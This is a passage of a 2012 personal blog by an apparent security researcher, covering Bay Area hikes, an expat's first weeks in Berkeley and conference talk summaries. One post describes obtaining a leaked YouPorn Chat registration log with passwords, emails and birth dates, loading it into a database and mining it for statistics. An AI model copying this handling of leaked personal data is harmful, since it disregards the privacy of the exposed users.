All in all it took me 3 days to fill out all the forms and to wait until the state of my account was batch processed to a completion. Sigh, and I always thought that ETH was inefficient and bureaucratic.

Wildcat Canyon hike

2012-09-15T21:31:00-04:00

During the long and strenuous hike in Mount Diablo state park my hiking boots broke and fell apart. The plastic sole apparently lost its flexibility and completely disintegrated. So we had to buy new hiking shoes at REI. As you could have guessed the only model that actually fit my feet was the most expensive Salomon model for 230$. On the other hand, the old pair of boots latest for more than 10 years, so it's not that bad. To break the new boots in we decided to head off to an easy hike this Saturday, covering only a couple of miles and (almost) no elevation gain. Wildcat Canyon is a regional park close to Albany and only a 15min drive away. On the plus side we had time for a couple of GeoCaches on the way! If you have kids: plan a long stop at Little Farm; there are tons of (farm) animals walking around that your kids can pet and look at. The hike is easy, we brought around 1/4 gallon (1l) of water per person.

Trail navigation

We parked near Little Farm and started on the Loop road and headed off towards Laurel Canyon trail. The Laural Canyon trail ends in Nimitz road which is an easy fire road along the rim of Wildcat canyon. Near the second GeoCache we headed off from the trail and went up a little hill. The hill offered a perfect view of the bay area, San Francisco, the Golden Gate bridge, and Sausalito. We then followed the Meadows Canyon trail back to Little Farm and to our parking lot. View Map

Hike description

The hike is an easy Saturday stroll of around 6.2mi (10km) with negligible elevation gain. Most of the hike is on paved or unpaved fire roads with some stretches on trails. If you want to follow our hike make sure to check the map above to discover the right place where you have to break out for the most awesome view of the bay area ever.

Picture time

The pictures where taken during the hike and show some of the best views during the hike from the top of the little hill plus some shots after we found the GeoCaches.

Short stop on Nimitz road.

View from Nimitz road.

View from top of the hill into the back country.

View from top of the hill into the back country. The amazing mountain in the back is Mount Diablo.

View from top of the hill towards San Francisco and the Golden Gate bridge.

Summary

The hike was a basically nice Saturday stroll that gave us the opportunity to visit a couple of GeoCaches. The area is nice but frequented by many walkers, runners, bikers, strollers. So if you want the quite natural reserve experience then this is not the right park. On the other hand if you are looking for a quick escape from day to day troubles then this is the right place to go!

Mount Diablo State Park

2012-09-13T21:18:00-04:00

When we visited the Black Diamond Mines regional reserve the ranger told us a bit about Mount Diablo. Mount Diablo is a pretty young mountain and when it rose all the geological features of the area changed. In the Black Diamond Mines you can observe that the different geological layers are tilted and they all rise towards Mount Diablo. The ranger got us interested and we wanted to explore the area for ourselves. So we headed off to Mount Diablo State Park for a strenuous hike. According to the hike reviews on the web the most interesting hike is the so called "grand loop" that starts halfway up to the top of Mount Diablo and goes complete around it, covering three different peaks on the way.

The official "map" for this state park is really bad, many trails are not on the map and the scale is too coarse grained plus the trail heads are not marked well. My advise is to bring a GPS (e.g., a Garmin) with the OpenStreetMap maps of California. These maps include all trails of the state park and will help you during your hike.

Health warning: you are exposed to direct sun light through most of the hike plus it is super hot, even in September. Bring plenty of water (at least 3/4 of a gallon - 3l per person).

Trail navigation

The trail head is located right next to Juniper campground, there is plenty of parking (10$) available at the nearby campground. This hike is a grand loop around Mount Diablo with three peaks that you can climb. Depending on your condition you can do one, two, or all three peaks. Follow Deer Flat road to Meridian Ridge road. The first peak you can climb is Eagle peak (follow Eagle Peak trail), which offers a nice view of the area and some old open mining regions. When returning from Eagle Peak trail take the Bald Ridge trail to get to the trail head to the second peak. North peak is reached by North Peak road by a steep incline of around 0.8mi (1.2km) and the view is so so. The peak is mostly covered by mobile and satellite antennas which tend to spoil the atmosphere. Back track to the end of Bald Ridge trail and continue on the North Peak trail until you reach Summit trail. Summit trail takes you up to the final peak: Mount Diablo. The last peak offers the best views: you can see for up to 200 miles into the different California region and you'll even see downtown San Francisco. Back track using Summit trail and follow Juniper trail to the parking lot. Watch out, the trail head of Juniper trail is hard to find. View Map

Hike description

The length of the hike is only around 10 miles (~16.3km) with ~3680ft (1120m) elevation gain. The hike is very strenuous as you are exposed to the sun during most of the time and Mount Diablo tries to step up to his name. The amazing part of this hike is walking along the ridge to Eagle peak, the steep incline up to North peak, and the magnificent views from Mount Diablo.

The height profile shows the decline from the parking lot and the inclines to

Eagle peak (2nd peak in the picture), North peak (3rd peak), and Mount Diablo (4th peak).

Picture time

Some pictures that we took on the way up.

On the Deer Flat road, behind us is the Juniper campground

After locating a GeoCache.

Exhausted on Eagle peak.

View from Eagle peak.

On the way to Mount Diablo.

View from the top.

View towards South.

View towards North peak.

Summary

Overall I would classify this hike as strenuous 6 hour day hike. The three different peaks are great highlights of this trip. If you get tired on the way you can easily leave out some of the peaks (start off with North peak as this peak is only special because of the steep incline at the end). Watch out to bring plenty of water on the hike, otherwise you'll dry out in the heat!

Point Reyes National Seashore

2012-09-11T18:30:00-04:00

After some time in the national parks we wanted to explore the national seashore as well. Point Reyes is pretty close to us and the reviews sound as if the park could be fun! The drive from Albany to Point Reyes was around 1hr in early morning traffic, not too bad, but the road was in a bad shape and you had to take care. Again we packed our bagles and around 2l of water per person.

Hike description

The hike was awesome, we enjoyed the dense forests, the great diversity, and the awesome views when we got close to the coast. During most of the time we were covered by trees and bushes, so it was neither too hot nor too cold; close to the coast you might need a light jacket otherwise a t-shirt is perfect. We started off with the hard part: the first part of the hike was pretty steep, zig-zaging up on the Horse trail was exhausting and we got a bit sweaty. After covering the elevation difference the rest of the hike was a breeze, meandering down towards the coast. The view is kind of secluded until you are close to the coast but you can always enjoy the nature. Near the coast you have a breathtaking view, including some cliffs.

Height profile of the complete hike.

The length of the hike was around 14mi (~22.5km) with an elevation difference of roughly 2100ft (660m). We were a bit exhausted from the length of the hike but the difficulty is pretty low.

Picture time

The following images show some impressions from the hike, mostly taken on the Coast trail where the view is most impressive!

Summary

This hike is an awesome 6 hour day hike. There are plenty of areas where you can rest and enjoy the view. Most of the trails are covered by trees and bushes, so the heat is not too bad. The views along the coast are breath taking.

Black Diamond Mines Regional Reserve

2012-09-08T21:43:00-04:00

Our first hike from our new home location was in Black Diamond Mines Regional Reserve. We planned the hike one day before, bought enough food (two bagels for me, one bagel for Lumi, fruits, and some sweets) and around 3l of fluids. The drive took less than an hour from Albany, CA and parking costs 5$.

Trail navigation and hike description

Unfortunately we forgot our GPS at home, so this hike only contains a description of the hike without height profiles and detailed GPS log. We started off from the visitor center (map) and the trail head of the Chapparral trail which then turned into the Manhattan Canyon trail. After the short and steep incline we continued on the Black Diamond trail where we enjoyed the view and stopped at the airshaft and at Jim's place. Both places were just holes in the ground and not that interesting. The trail continued to the Coal Canyon trail which lead us to Nortonville (an old mine city that is now deserted, unfortunately the early settlers took all the wood and iron with them, so there is not much left of the city). Later we continued to Rose Hill Cemetery and back to the picnic area where we had our late lunch.

Picture time

The following pictures were taken during our Black Diamond hike.

View of Summerville.

The old airshaft.

Lumi tries to hide.

The Rose Hill cemetery.

Special detour: entering the mine

After our lunch we went to the Hazel Atlas mine for the grand tour. While we waited for the tour to start we strolled to the gun powder depot that was nearby and accidentally found a GeoCache. The tour of the mine was very interesting, although they only showed us the silica mine that was mined to gather resources to make glass. The black diamond (coal) mine is closed to the public due to structural instabilities.

The above image was taken at the entrance of the silica mine. The image shows a collapsed part of the coal mine. The little dark layer in the middle is all that is left from a coal mine shaft after the coal has been mined. This is the reason why the remaining parts of the coal mine are not open to the public. The silica mine is structurally more stable and is therefore open to the public.

The above image shows the view into one of the cross shafts from the main tunnel.

The picture above and below show old trains used to transport the silica out of tunnel.

The above picture shows me touching the fault line that runs in the tunnels below. Amazing feeling!

Another picture into a side tunnel that was used to dig out the silica.

The picture above shows the control room (or a replica thereof) with all the old utilities and the old work desk.

Summary

All in all we enjoyed this fun hike and had a great time. The mine tour made it very interesting as well, the last time I visited a mine was as a kid! This hike is great for families too, maybe limit yourselves to only the shorter loop, or up to the cemetery - the kids can play during the hike and then enjoy the mine tour. Explore the park and the mines!

An expats start as a security postdoc at UC Berkeley

2012-09-02T19:10:00-04:00

What is this blog post all about (aka tl;dr)?

This post covers our first two weeks in Berkeley, California and includes our struggles to find reasonable housing, a car, pitfalls with Visa requirements, how to get a driving license, and generally how to start a new life in the US - if all you have fits into a bag plus 1 piece of hand luggage (per person).

Day 0 (August 20st): flight from Zurich to Philadelphia to Phoenix to Oakland

When planning our emigration from Switzerland a couple of months ago we booked the cheapest flights to Berkeley that were in a reasonable time frame. US Airways had great flights to Oakland (OAK) airport from Zurich (ZRH) via Philadelphia (PHL) and Phoenix (PHX). The flight from ZRH to PHL was uneventful; US Airways is a cheap airline that has no entertainment system whatsoever on the other hand if you carry a good bock or a tablet the time passes quickly. A couple of years ago US Airways decided to remove all the in flight entertainment systems to cut down on costs. In my opinion this was a great idea as more and more people bring their tablets (with preloaded movies and series) and no longer need the entertainment system anyways. Plus on my flight from ZRH to San Francisco (SFO) with Swiss Airlines earlier this year the screen was broken on my seat and on the way back the entertainment system was not working for the complete economy part of the plane. When we landed in PHL we had to wait around 90 minutes for immigration plus an additional 60 minutes at security; the immigration was smooth but we ended up missing our flight to PHX our bags unfortunately made it to the flight. The transfer guys at the US Airways desk did a great job and rerouted us on the same day to SFO instead. We were told that the bags will be delivered soon - but this is a different chapter. After arriving at our hotel, the Piedmont House we discovered that this hostel has no reception and is basically some sort of frat house for weird people. A bunch of guys and girls are living there together without any organisation whatsoever. When you "check in" you can grab some keys from the key board and then try to find your room. The online advertisement looked good, the pictures were nice, and the self check-in sounded like a great idea (I assumed some online system that would hand us a room card when entering) but our expectations were a bit too high. Just so you can relate: I consider myself a traveler and I have stayed in a fair share of shabby hostels without much troubles but Piedmont House is pretty bad.

The house and the rooms are very old, smelly, and the bathrooms are sub par (i.e., there are two showers for 10 rooms or so but only one shower works, the other shower stall is used as storage for old lamps and stuff). The house features a shared kitchen as well; watch out: if you store food in one of the shared fridges it might disappear plus there are rats (and mouse traps) in the kitchen. Unfortunately we booked a double room for one week. As we were arriving in the first week before the new semester all hotel rooms in the area were booked and the hotels tripled their prices, yet I would still advise you to stay in a different hotel, with a friend, or just sleep in the park! We were trying to get hold of somebody (i.e., the owner or some staff) to tell them that we were expecting our bags from the airline but no luck. We managed to tell them the next day that we were expecting bags but nobody of the staff seemed to care. Later when we were reunited with our bags we found out that the US Airways delivery guy tried to deliver the bags twice and nobody answered the door nor did anybody answer the phone number that is listed on the Piedmont House contact page. That's what I call a shitty hostel!

Day 1 (August 21st): a brave new world (and apartment)

This was the time when Lumi (nickname of my wife Anna Barbara) hit rock bottom the first time: the combination of new country, immigration, loosing our bags, a crappy shabby 'hostel' room, and disgusting shower stalls. As soon as we had breakfast we started looking for an apartment in the area.

The areas we considered were Berkeley (obviously), Emeryville, Oakland, Albany, and El Cerrito. Berkeley is a very vibrant student city and offers everything you need. South of the UC you find all the student housing, fraternity parties, cheap eats, and Telegraph avenue with lots of shops and food options. West of the UC you find the so called gourmet ghetto with even more food options and a couple of hotels and motels along University avenue. Prices for a 1 bed room apartment are around 1300 to 2000 plus there is a huge competition when you look for an apartment (an owner told us that he got 60 calls in 2 hours for one apartment; 10 people would sign the contract without even looking at the apartment). Emeryville is south of Berkeley and a 3 to 6 mile commute to the UC and housing is a little cheaper. If you like an all inclusive resort: have a look at the Watergate community, they offer swimming pools, tennis courts, and whirl pools all included in the rent. Unfortunately no free apartment was available when we were looking. Oakland is even further from Berkeley and comes with a 4 to 10 mile commute to the UC; if you want to live there you should consider taking the BART or the Bus. Apartment prices are even cheaper but the area can be a bit dodgy, so watch out. Albany is a small village north-west of Berkeley and comes with a 3 to 4 mile commute to the UC. Albany offers many shops, restaurants, pubs, and other small village perks around Solano avenue and San Pablo avenue. El Cerrito is a bit further up north from Albany and comes with a 4 to 8 mile commute to the UC.

If you want to find something in the bay area that is not new you will have to check out craigslist. Craigslist is like an online black board with millions of postings and listings. You can get everything on craigslist from second hand toasters, to bikes, to cars, up to apartments. We looked at more than 200 apartment listings in the areas described above, sent more then 20 emails to the different owners, called around 10 owners, got 5 appointments, and looked at two apartments. All on one day. The market is very competitive and you have to sweet talk people into leasing you the apartment right away. We decided quickly to get the second apartment we looked at, stuck around after the showing, and settled the lease with the property manager (including handing over the cashiers check for the deposit and the down payment) before the others could even hand in their possible application for the apartment. The 2 bed room apartment we got is in Albany and the commute to UC is around 3.2 miles plus there is a bus stop right in front of the apartment. Good news: we can move in on Sunday (in 5 days). A note on transportation: public transportation in the bay area is reasonable (good compared to other areas in the US, bad compared to Switzerland). Caltrain (a commuter train) connects San Francisco with San Jose; BART (a light railway) connects both international airports, San Francisco, Berkeley, and Richmond. AC Transit (a bus line) connects the cities on the east bay.

Day 2 (August 22nd): organizing a ride

No matter how good public transport is you'll still need a car in the US. In Zurich we were able to live without a car for the last 10 years but the distances are just longer here in the US and even for basic tasks like grocery shopping, going to a workout, or going to the movies you'll need a car. Our plan was to get the smallest car possible and we set ourselves a budget of 4k$ for a used car with less than 150k miles and not older than 10 years or <10k$ for the smallest new car that we could find. We talked to a couple of friends and I read tons of online posts about the topic and the chime was: never buy a used car at a used car dealer. They basically offer the same guarantees as private sellers but they add 1k$ to the private and they will tell you anything (aka they are professional liars). That's why we started with craigslist. Generally we followed this great checklist on how to buy a used car and we used Autocheck to check the VIN numbers of all the cars we looked at. The VIN number shows the registered mileage, any accidents the car was in, and other general information that helps you make up your mind about the price.

It was actually harder than expected to find a car that met our criteria (<10 years old, <150k miles, <4k$) but finally we found a Mazda Protege from 2001 with 138k miles for 2650$ and a Toyota Corolla from 1999 for 3500$. We called both guys and organized test drives on the next day.

This afternoon our bags finally arrived. I had to call US Airways a couple of times until I got to the right person and I was then told that they already tried to deliver the bags twice but nobody picked up the phone at our hotel and that nobody would answer the door. Luckily I got a very understanding and friendly person on the other end and she organized a third delivery of our bags. I waited on the veranda until we were finally reunited with our bags. Thanks again Piedmont House for not answering the phone nor opening the door when a delivery guy comes by.

Day 3 (August 23rd): banking troubles (1) and meeting our ride Marvin

As we were slowly running low on dollars we tried to wire money (10k$) from Switzerland to our Wells Fargo account and asked a Wells Fargo banker to write down the wiring instructions for our checking account. From an earlier fraudulent charge I ended up with two checking accounts, one with the money and one with 0$ in it. We closed the account with 0$ and found out afterwards that the banker gave us the wiring information for the checking account with 0$ in it. The wire ended up somewhere in the air, Wells Fargo removes 72$ from the 10k$ and sent the money back where we payed the conversion fees twice (CHF to USD and USD to CHF) and we basically lost 250$ in this transaction thanks to confusing information from a Wells Fargo banker. Compared to Europe the US banking system is completely broken; everything relies on checks and money transfers between banks is completely inconvenient and a huge hassle. Another huge problem is that the average banker (at any bank) is just a trained monkey. The bankers will lie to your face and tell you any misinformation they want just to 'help' you. All of them are very friendly and sound kind of competent. But different bankers contradict whatever the previous banker said. As a banker in the US you don't need any training, education, or you don't even need a clue what's going on. For example, I had a life-long-free-account and I got a fraudulent charge on my debit card. Instead of just issuing a new debit card (with a new number) banker A decided to sign me up for a new checking and new savings account that is no longer free as there was no way of issuing a new card with a new number according to her. That's how I ended up with 2 savings and 2 checking accounts in the first place. She told me that the account would be free and she would set up some transfers and get everything ready. Banker B told me that we can close the old bank accounts so that I only have one checking and saving account each left (shortly thereafter the wire arrived and we lost our 250$). Banker C then told me that Banker's A and B were full of shit and that we could have kept the other free accounts. Some bankers told us that we can use our European Maestro (EC) cards to withdraw money, others told us we couldn't. Basically no two banker told us the same consistent story or information. This makes it very hard to trust the US banking system as Wells Fargo appears to be one of the better banks. My conclusion: never leave too much money in the US, transfer as much as possible back to your home accounts where banking is a serious business and not just a joke.

On the afternoon we had our appointment with Jason to test drive the first car. We liked the stick shift Mazda Protege from the start, the car was in good shape and the test drive went smooth. One of the most important things when buying a second hand car is to bring it to a mechanic and after reading the Yelp reviews we decided to go to Steve's Auto Care in El Cerrito. We didn't have an appointment and Steve told us that we were a bit too late and that he couldn't do a full check, yet he looked at the cor for almost 30 minutes and gave us great information about the state of the car and what to expect. That's when we decided that whenever we had any repairs we would go to Steve! In the end we decided that we would buy the Mazda as it was a good deal and we both liked the car. We scheduled to hand over the money in cash on the next day as the amount was low enough not to bother about a cashiers check.

Day 4 (August 24th): happy birthday

Today was my wife's birthday and I surprised here with breakfast in bed with some cake and a nice card. After breakfast I started calling different people. We organized home renter insurance for our apartment, car insurance for our new car so that we could drive from Jason's house to our apartment. Geico was the insurer of our choice for both the car insurance and the home insurance as they offered a reasonable deal and coverage (around 250$ each). After covering the insurance we got ourselves appointments at the DMV for our written driving tests - the international driving licence is not accepted in the US and you need to redo both the written and the behind-the-wheel test. After sorting out all our telephone calls we went on an online shopping spree on Amazon prime and bought router, modem, and other stuff to start up our digital life.

In the afternoon we celebrated Lumi's birthday by going to the movies and watching Brave. Later we took the BART to Jason and finally bought our car - we named him Marvin and parked him in the garage of our apartment.

Day 5 (August 25th): the lush life

In the last couple of days we were able to find an apartment and to buy a car, we deserved a day off! We slacked around for a bit, walked around on the campus, and went to an all you can eat pizza place near Telegraph avenue. Afterwards we went to the movies again. I guess we deserved it!

Day 6 (August 26th): moving in

In the US you can actually move in on Sundays. We were very happy to leave crappy Piedmont House and took the bus to our new apartment. Unfortunately we got quite an unpleasant surprise: the apartment was not cleaned by the previous tenant. The whole place was quite yucky, the kitchen and bathroom floors were not cleaned and very sticky, the shelves very dirty, or there was left over stuff in there as well, the stove and oven were super dirty and sticky. We taught hard what we should do and in the end we decided to go to Target to buy cleaning material and to clean the floor and some of the shelves and cupboards we use. We just put all the baking trays and all other stuff that was laying around into a cupboard and closed it until we move out. That's when Lumi hit rock bottom the second time. For our safety we took lots of pictures so that the owner cannot complain if we do not clean the apartment when we move out.

In the morning we bought a GPS navigation system for our car - these things are so convenient! In the afternoon we went to Ikea and bought all the basic kitchen stuff, a mattress, a table, a couch table and lots of other small things. Until late at night we spent our time building all the stuff we bought and I even managed to wreck our living room table by turning in the screws so tight that they came out at the top end.

First week recap:

We managed to move out of the worst youth hostel ever without getting any diseases (I was bitten a couple of times by something that lived in the mattress), we found a place to stay, we bought a car, we got the apartment cleaned up and made it livable. If you are interested in how much money you'll need for the start: apartment 2000-4000$ deposit and first week, car 2000-4000$, furniture and basic appliances: 1000-2000$.

Day 7 (August 27th): building a place to live

We went to Ikea again to buy a second table plus more chairs. This way we can use the wrecked table as a desk in the second bedroom and if we have many guests we can put both tables together. Our next item on the list was to go to Target and buy all the basic food stuff that we need. We spent the rest of the day building, constructing, and cleaning. The sad part of this day was that our Swiss Mastercard was blocked. The fraud protection kicked in when we tried to buy furniture from Ikea the second time. I had to call the emergency number to get the card reactivated.

Day 8 (August 28th): the written DMV test

We assumed that we have an appointment but you have to wait at the DMV even if you have an appointment (for 30 minutes - if you don't have an appointment than you have to wait up to 3 hours). The written driving exam was a peace of cake. We learned for about 3 hours each and Lumi aced the test, I had one mistake (6 mistakes are allowed).

In the afternoon we went to another shopping spree and bought our couch at Target and a huge amount of other stuff online: a bike to commute to UC, a TV from Woot, and a bed box from Walmart.

Day 9 (August 29th): getting settled and meeting the gang

While I had to attend one of the most boring meetings ever Lumi had fun with the Comcast guy who installed our internet access. As part of the J1 visa I had to attend the mandatory visa information meeting. If you don't attend this meeting then you don't get authorization to travel outside the US during your postdoc. As this was my second time as a J1 the meeting did not yield any additional information for me and I just had to sit it out.

I thought that I could visit the other postdocs and PhD students while I was at Berkeley. During lunch I met with the security reading group and got to know some interesting people.

Day 10 (August 30th): meeting Mario and family

This was the first time we tried to do sports here in the US. We went running but the GPS did not pick up a signal until we finished our track. We found some spots with a great view over the bay area. Later that night we were invited by Mario and his family to have dinner at their place. What a wonderful and chilling night.

Day 11 (August 31st): trying to work

Our last Ikea and Walmart trip. We bought the last couple of things we forgot the last times and completed our furniture.

Day 12 (September 1st): beautify the apartment and checking out the nightlife

Lumi started painting the walls and beautifying our apartment while I tried to work a couple of hours. After almost 1 1/2 months of holidays it's kind of hard to get back into "work mood". After work we went bowling to our local bowling alley. Later that night we found out that it is kind of hard to get food in the US after 10pm if you are not driving around. Sizzlers, Taco Bell, and McDonalds all close between 9pm and 10pm for walk-in customers. On the other hand the Taco Bell and McDonalds drive-ins are open all night long. We actually have to get used to this kind of mentality.

Second week recap:

We started making the apartment livable, built all of our furniture, passed the written DMV test, got internet access, went to the Visa information meeting, and had a meeting with other post docs. This week was kind of productive and we managed to get settled in our new home.

Conclusion: so far, so good

We had a hard start, got lucky with the apartments and the car and managed to play our cards well. Our experience shows that you need at least one week to organize an apartment and a car. The second week is optional and helps to construct all the furniture and to get settled in. During your first two weeks you have to accept to hit rock bottom once or twice - the culture shock combined with a huge list of stuff that you need to do can be demanding and tough, but you'll get over it. Plan well and it will end well.

One of the things we have to get used to around here is that the culture is so different: everything is built on the cheap and optimized for low cost of ownership combined with high current costs. Apartments have no isolation but gas heating, cars are cheap but need more fuel per distance compared to European cars.

We have settled for the next year and we are ready for visitors. We already partially explored the area but there is still lots to see and we are always happy about people who join us!

Hard data on YouPorn

2012-02-22T17:54:00-05:00

Introduction

As you might have heard (or not) YouPorn Chat had a huge information leak on February 21st 2012. One of their servers served a directory with all registration log files from the last couple of years (http://chat.youporn.com/tmp). Apparently this chat server is not serviced by the YouPorn guys but by the YouPorn chat guys according to their blog post. Nevertheless, I assume that there will be a huge overlap for the passwords between the chat service and YouPorn in general and as well as to other accounts. The files were world-readable and could be downloaded. Some Swedish guys at flashback.org discussed what they could do with the log files. They discovered that the logs contained all registration details and account creation details of all users from 2008 to 2012 and they shared it with the world. Soon thereafter Anders Nilsson published an analysis of all passwords on his blog. His analysis shows the top passwords and he shows some statistics about the different passwords. Non surprisingly the 10 top passwords are 123456, 123456789, 12345, 1234, password, qwert, 12345678, 1234567, 123, and 111 111. But analyzing passwords is only the first step. When I read about the password breach on twitter I thought that we could do more with the available data and I got my hands on a copy of the logs. The log files show detailed information about username, password, email address, country of origin, date of birth, and user id. So let's play!

Log format

The log format is really simple and consists of logged registration attempts and server responses. A registration attempt is logged in the following format:

<user_register.php: 2010-01-11 00:00:03
  POST
  username=MyFunnyUsername
  email=Mail@Foo
  email_confirm=Mail@Foo
  password=1234
  password_confirm=1234
  country=US
  msisdn=
  isyp=0
  isPremiumChat=
  dob=1990-08-17
  sub1=1
  sub2=1
  is3g=
>

I guess that username, email, password, country, and dob (date of birth) are self explanatory. The server responds with either a reply that there was an error or with a new user id. A registration is unsuccessful if either the email or the password do not match or if the username is already taken. The error code is encoded as the following message:

<REPLY username =fucking whore
  status =207
  err_msg =202
>

A successful registration contains a correct status and a new userid:

<REPLY username =LaraDWT28SL
  status = OK
  user_id =3565583
>

After downloading the files I had to parse them using some script foo. A dirty little python script {link file} did the trick. As I wanted to do some heavy number crunching and I did not want to spend days reevaluating the same data over and over again I imported all the logs directly into a not so small MySQL database. The database has the following layout:

CREATE TABLE accounts (
  date DATE,
  username varchar(128),
  password varchar(128),
  email varchar(128),
  dob DATE,
  country varchar(2),
  userid INT DEFAULT -1,
  INDEX (date),
  INDEX (username),
  INDEX (password),
  INDEX (email),
  INDEX (dob),
  INDEX (country),
  INDEX (userid)
) TYPE=InnoDB;

The complete import, i.e., parsing, formatting, MySQL import, and index generation took a couple of hours. Due to weird formatting I lost some accounts during the import, so the numbers are a lower bound to the total numbers.

Analysis

With so many raw data sets (5290696 registration attempts led to 1202040 unique user accounts) it is hard to work with text files only. So the MySQL database was a good choice to start with. One of the most interesting analyses is the password analysis. Andres already published a breakdown of the passwords in his blog and the full results on pastebin. I assume he filtered the raw data for the raw passwords. Using a database I have the advantage that I can select more detailed combinations of data. In the following analysis I will look at country specific details, registration attempts, email addresses, and the age distribution of the YouPorn users.

By country

The top country with most registrations is the US (27%), followed by Germany (12%), the UK (9%), Italy (5%), the Philippines (4%), Canada (3%), France (3%), India (3%), Australia (2%), and Mexico (2%). The graph shows a pie chart of the 20 countries with most registrations.

If we look at registration attempts then the picture is a little different. The log files contain a total of 4,088,656 registration attempts and 1,202,039 successful registrations, so on average a user tried to register more than 3.4 times until he/she was successful. Typing captchas with one hand must be hard (pun intended).

The number of total registrations actually seems to scale by country. There is no country that has significantly more failed registration attempts than an other country. India, Indonesia, and the Philippines have a slightly higher amount of registration attempts than the other countries. The table shows the number of registered accounts and the number of registration attempts.

Age distribution

The age distribution graph shows the fraction of total registrations per year of birth. The average porn registrant is 31.04 years old, with a tendency of getting younger, most registrants are 24 years old and represent 7.96% of all registrations. The two peaks in the graph are around the ages 32 (year of birth 1980) with 5.72% of total registrants and 24 (1988) with 7.96%. The older people get (above 30) the less likely they are to register.

The graph shows that there is a high rising edge around age 20 that drops off slowly. The question remains if younger registrants just enter fake birth dates or if they do not register at all. Apparently the website did not impose any age restrictions as the year of birth span starts in 1908 and goes up to 2007. Unfortunately real work calls right now, stay tuned for more results!

28c3 - 28th Chaos Communication Congress & Berlin Sides or a tough week in Berlin

2012-01-09T13:59:00-05:00

Last week we celebrated that special time of the year again. For me it was the 8th time that we went to the Chaos Communication Congress and the 3rd time that I had a talk. This year we also had tokens for the BerlinSides, a side conference with only technical talks organizes by Aluc.

We carried out the same procedure as every year; Stormbringer and I meet on December 26th around 7pmish at the airport in Zürich for a beer or two. Unfortunately he was late, so I had to drink alone. No harm was done as I still had to finish the slides for my talk. The flight was really smooth and we arrived at 11pm at the hostel. Following our regular procedure we walk right to the bcc to get our badges (and the first couple of beers). A couple of things changed this year, the bcc committee no longer allowed smoking inside the venue so the hack lounge (that was very cozy in the last couple of years with many couches, music, video installations, good wired network connectivity) was replaced by a smoking tent outside of the bcc that had like 1/100 of the style. The hacking area was never as crowded as it was in earlier years and the hackers are moving more and more towards software only. Well, nevertheless we had to try out the lounge/tent on the first day and were thrown out at around 4am. That's one other novelty: for the first time the bcc (or parts of the congress) closed during the night. The following four days went by in a blur. I watched many interesting talks, met many interesting people, had good discussions, had a blast during my talk, and had the one-odd beer or so. I organized the interesting talks into three categories, technical talks, political / social talks, talks that I would have liked to watch. The talks are ordered according to my subjective rating on a scale from 1 to 10.

Technical talks:

String Oriented Programming, Mathias Payer (my talk)

Mathias first gives an overview of all the different attack vectors that are currently used in exploits (code injection, return oriented programming, jump oriented programming, and format string attacks). He then discusses the available defenses on current systems (Data Execution Prevention, Address Space Layout Randomization, and ProPolice). Using a tool that emits specially crafted format strings he presents an attack that can be used to rewrite some static regions of a program (e.g., GOT, or PLT regions of the main executable) into a jump/return oriented interpreter that reuses parts of the application to execute arbitrary code.

Print Me If You Dare, Ang Cui, Jonathan Voris (8)

Ang et al. present an awesome hack how you can upload your own malware to regular HP printers. Current HP printers are connected to the network, have fairly powerful processors, and can be updated (without authentication) over the Internet. The talk includes a live demo. Great presentation!

Datamining for Hackers, Stefan Burschka (7+)

Stefan gave great talk about the potential of datamining and how datamining can be used to exploit and analyze legacy systems. Stefan talks about traffic mining where he exclusively looks at traffic patterns and unencrypted fields in the headers (e.g., length, flags) to infer details of the encrypted connection (e.g., pauses, which party is speaking, and other details). All in all an entertaining talk with medium level of details and verbosity.

802.11 Packets in Packets, Travis Goodspeed (and Sergey Bratus) (7)

Travis and Sergey talk about and introduce probabilistic packet injection. If the wireless signal is congested in one way or another or if there are interferences then the transmission of a packet can be incomplete. The main idea of the hack is that a part of the original (legit) packet is destroyed during the transmission. The data section of the packet now contains a complete inner packet of the same protocol. If the header of the original packet is destroyed then the inner packet is parsed like a regular packet. This hack can be used to inject illegal packets into protected networks (e.g., somebody downloading a large file; some packets are transmitted wrong and are reinterpreted as "attack packets" due to the Trojan horse character of the packets). The idea is really nice, but I doubt that an attacker is able to race a sufficiant amount of times against the (very low) probability that only the header is destroyed and no other parts of the data section that contains the illegal packet. After the talk I actually asked this question and Travis did not really answer it.

Can trains be hacked?, Stefan Katzenbeisser (7)

Interesting talk (in German) about the history of train safety (including infos on signalling, relays, and so on). Stefan includes details on "Stellwerken" as well.

The Atari 2600 Video Computer System: The Ultimate Talk, Sven Oliver ('SvOlli') Moll (6)

Interesting talk bei Sven about all the Atari 2600 internals. Sven was inspired by Michael Steil's talk at 26c3 about the C64 internals (which was an awesome talk as well, go watch the recording!). Sven presents a nice introduction about all the hardware details of the Atari 2600, the development of ROM/RAM boards, and a lot of nitpicking about programming the given hardware.

x86 oddities, corkami (6)

Corkami presents nice subtleties of the x86 machine code. He shows undocumented instructions, especially how these instructions can be used in packers and malware to circumvent debuggers, emulators, and other checking techniques. Very low level talk that assumes a lot of prior knowledge of x86. Overall very interesting, unfortunately there is no recording available.

Reverse Engineering USB Devices, Drew Fisher (6)

Drew is a MsC student at UC Berkeley in Human Interaction. He talks about the USB protocol and how to reverse engineer drivers for new USB hardware.

Introducing Osmo-GMR, Sylvain Munaut (6)

Hacking satellite phones. Sylvain introduces a new feature for the Osmo software stack.

Defending mobile phones, Karsten Nohl, Luca Melette (5)

Karsten and Luca show techniques how to clone existing mobile phones given a regular call that can be eavesdropped. The cloned phones can be used to call premium numbers or to send text messages to premium services. After the motivating example they shows how the attacks that Karsten and co. developed during the last couple of congresses can be mitigated using additional software, additional checks, or new algorithms. Interesting talk, but the "big hack" was missing. They gave a great overview of the available attacks but failed to bring up something new (for this year).

Rootkits in your Web application, Artur Janc (5) (2nd link)

A regular XSS bug is used in combination with new HTML5 features to implement persistent rootkits in web applications. The combination of persistence and XSS bugs enables rootkits that reinstall themselves even if caches are cleared. Artur also explains how these rootkits can be used to grab information and forge, e.g., baking sites.

New Ways I'm Going to Hack Your Web App, Jesse Ou, Rich (5)

Similar to Rootkits in your Web application. Featuring HTML5, XSS attacks, and other nice technologies.

Cellular protocol stacks for Internet, Harald Welte (5)

Great overview talk of all the wireless protocols used in the last 20 years. If you want to know more about GSM, UMTS, and all the other protocols, then go watch this talk to get some pointers. If you are not interested in an overview, then the talk is just a 1hr show of three letter acronyms.

Time is on my Side, Sebastian Schinzel (5)

